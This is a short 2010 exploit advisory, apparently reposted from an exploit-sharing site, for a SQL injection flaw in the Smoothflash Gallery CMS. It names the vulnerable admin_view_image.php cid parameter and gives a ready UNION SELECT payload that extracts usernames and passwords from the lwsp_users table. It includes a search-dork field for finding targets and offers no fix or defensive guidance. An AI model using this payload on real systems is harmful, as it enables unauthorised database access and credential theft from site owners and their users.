Smoothflash Gallery SQL Injection Vulnerability
Posted on 07 April 2010
=============================================== Smoothflash Gallery SQL Injection Vulnerability =============================================== ############################################################################################################# ## Tittle : Smoothflash Gallery ( SQLi Vulner ) ## ## Author : SENOT (selalungantuk_exe@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : Thursday 07 April, 2010 ## ## Location : - INDONESIA - ## ############################################################################################################# [+] CMS INFO [+] Name : smoothflash Flash Gallery [+] Vendor : http://www.smoothflash.com/ [+] Download : http://www.smoothflash.com/smoothflash_v10.zip [+] Vulnerability : SQL [+] Dork : "Dork Just for newbie" ############################################################################################################# [ Vulnerable File ] [+] http://127.0.0.1/[senot]/admin_view_image.php?cid=[INDONESIANCODER] [ XpL ] [+] -99999 union select concat(username,0x3a,password) from lwsp_users-- ############################################################################################################# # Inj3ct0r.com [2010-04-07]
